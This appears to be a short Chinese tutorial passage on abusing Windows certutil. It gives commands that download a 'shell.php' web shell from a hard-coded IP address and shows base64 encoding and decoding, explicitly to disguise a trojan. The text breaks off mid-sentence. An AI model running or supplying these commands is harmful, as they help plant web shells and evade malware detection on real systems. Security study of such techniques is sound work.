certutil
certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。
远程下载
certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下
certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下
文件base64编码解码
将a.txt文件base64编码为b.txt
certutil -encode a.txt b.txt
将c.txt文件base64解码为c.txt
certutil -decode b.txt c.txt所以可以将木马base64编码后再解码。这里的木马可以是exe木马或者是w
发布评论